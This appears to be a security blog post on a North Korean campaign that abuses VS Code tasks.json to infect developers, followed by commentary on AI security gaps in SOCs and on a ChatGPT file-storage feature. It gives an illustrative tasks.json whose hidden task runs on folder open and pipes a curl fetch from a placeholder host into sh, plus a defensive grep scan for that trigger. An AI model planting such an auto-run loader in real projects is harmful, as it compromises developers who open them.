North Korean Hackers Target Developers While AI Security Gaps Widen
As someone who’s spent the last decade watching threat actors adapt their tactics, I have to admit the latest campaign from North Korean hackers caught my attention. They’re now weaponizing something most of us use daily: Visual Studio Code’s task automation features.
Developers in the Crosshairs
The group behind the “Contagious Interview” campaign (also tracked as WaterPlum) has been busy since December, distributing their StoatWaffle malware through malicious VS Code projects. What makes this particularly clever is their abuse of VS Code’s tasks.json files – the per-project configuration that lets a workspace define build and automation commands developers rely on to streamline their workflows.
Think about it from an attacker’s perspective: developers are high-value targets with access to source code, development environments, and often production systems. By disguising malware delivery within legitimate development tools, these threat actors are essentially hiding in plain sight. When a developer opens what appears to be a normal project and trusts the workspace, a task configured to trigger on folder open can run automatically in the background.
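To make the mechanism concrete, here is a hypothetical sketch of what such a booby-trapped tasks.json could look like. The label, URL, and command are invented for illustration and are not from the actual campaign; the `runOptions.runOn: "folderOpen"` trigger and the `presentation` settings are standard VS Code task options (VS Code accepts comments in this file):

```jsonc
{
  "version": "2.0.0",
  "tasks": [
    {
      // Innocuous-looking label a developer would not question
      "label": "install dependencies",
      "type": "shell",
      // Hypothetical payload fetch – placeholder URL, not a real indicator
      "command": "curl -s https://example.invalid/setup | sh",
      "runOptions": {
        // Fires automatically when the folder is opened in a trusted workspace
        "runOn": "folderOpen"
      },
      // Keep the terminal hidden so nothing visibly runs
      "presentation": { "reveal": "never" }
    }
  ]
}
```

The key point for defenders: the payload delivery lives in project configuration, not in a binary, so it sails past most attachment-focused controls.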
This isn’t just another phishing campaign – it’s a sophisticated supply chain attack that targets the very tools we trust. If you’re managing security for development teams, now’s a good time to review what VS Code extensions and project templates your developers are using.
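As a starting point for that review, a quick scan for auto-run task triggers in cloned repositories can surface projects worth a closer look. This is a minimal sketch, assuming your checkouts live under a single directory; it only flags the `folderOpen` trigger and is no substitute for reviewing what the tasks actually execute:

```shell
# List any tasks.json under a directory tree that contains the
# "folderOpen" auto-run trigger. Prints one matching file path per line.
scan_autorun_tasks() {
  grep -rl --include='tasks.json' '"folderOpen"' "$1" 2>/dev/null
}

# Example usage (path is an assumption – point it at your checkout root):
# scan_autorun_tasks ~/projects
```

Pair this with VS Code’s Workspace Trust prompts: untrusted folders should stay in restricted mode until someone has actually read the project’s task definitions.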
AI Security: The Blind Spot We Can’t Ignore
Speaking of gaps in our defenses, a recent ISACA survey revealed something that honestly doesn’t surprise me but should concern all of us: most cybersecurity staff don’t know how quickly they could contain an attack on AI systems. The confusion isn’t just about technical capabilities – it’s about who is even responsible for those systems in the first place.
This ties directly into what we’re seeing from SOC teams experimenting with AI integration. Two cybersecurity leaders recently shared their six-month experience running AI tools in their Security Operations Centers, and the results were mixed at best. While AI can certainly help with alert triage and pattern recognition, it also introduces new failure modes that many teams aren’t prepared for.
The problem isn’t that AI is inherently insecure – it’s that we’re deploying it faster than we’re developing the expertise to secure it properly. When your SOC analysts can’t tell you how long it would take to isolate a compromised AI system, you have a fundamental gap in your incident response planning.
The Privacy Trade-off in AI Tools
Adding another layer to this AI security discussion is OpenAI’s rollout of their new ChatGPT Library feature, which lets users store personal files and images in OpenAI’s cloud storage for future reference in chats. From a user experience standpoint, this makes perfect sense. From a security perspective, it raises immediate questions about data classification and handling.
I’ve already started getting questions from clients about whether their employees can use this feature with work-related documents. The answer, for most organizations, should be a clear policy discussion rather than a blanket yes or no. But here’s the thing – if you don’t have that policy discussion proactively, your employees will make the decision for you.
What This Means for Our Teams
These stories connect in ways that matter for how we approach security in 2026. The North Korean VS Code campaign shows us that threat actors are getting more creative about blending into legitimate workflows. The AI security gaps reveal that we’re moving faster than our understanding. And the ChatGPT Library rollout highlights how quickly new features can create policy challenges.
The common thread? We need to get better at security education that goes beyond traditional awareness training. Our developers need to understand that project files from untrusted sources can be weaponized. Our SOC teams need specific training on AI system security. And our entire organizations need clear policies about AI tool usage before the next feature rollout catches us off guard.
None of these are insurmountable challenges, but they do require us to stay ahead of both the technology curve and the threat landscape. That means more cross-functional conversations, more hands-on testing of new tools in controlled environments, and honestly, more comfort with saying “we don’t know yet, but here’s how we’ll figure it out.”